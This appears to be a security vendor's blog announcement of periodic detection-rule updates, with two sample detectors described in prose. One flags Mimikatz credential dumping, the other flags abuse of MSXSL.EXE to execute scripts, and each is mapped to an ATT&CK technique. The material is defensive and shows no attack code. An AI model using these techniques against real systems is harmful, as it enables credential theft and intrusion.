We are often asked about the new adversary techniques we’re identifying and the research we are doing to hunt them down. We are excited to begin providing regular updates highlighting these improvements.
When Red Canary's security operations team or researchers identify behaviors, indicators, or attributes that can be used to describe a potentially threatening event, it is implemented as a Detector. A Detector may be very specific or very broad and tend to evolve over time.
We will be publishing these updates every one to two weeks in the Detector Updates section. An example of these updates is below:
Identifies instances of Mimikatz by identifying command line elements common to Mimikatz execution.
ATT&CK Technique T1003
Identifies malicious use of
MSXSL.EXE, a command line utility that performs Extensible Stylesheet Language (XSL) transformations using the Microsoft XSL processor. MSXSL.EXE can be abused to execute malicious scripts locally or remotely.
ATT&CK Technique T1127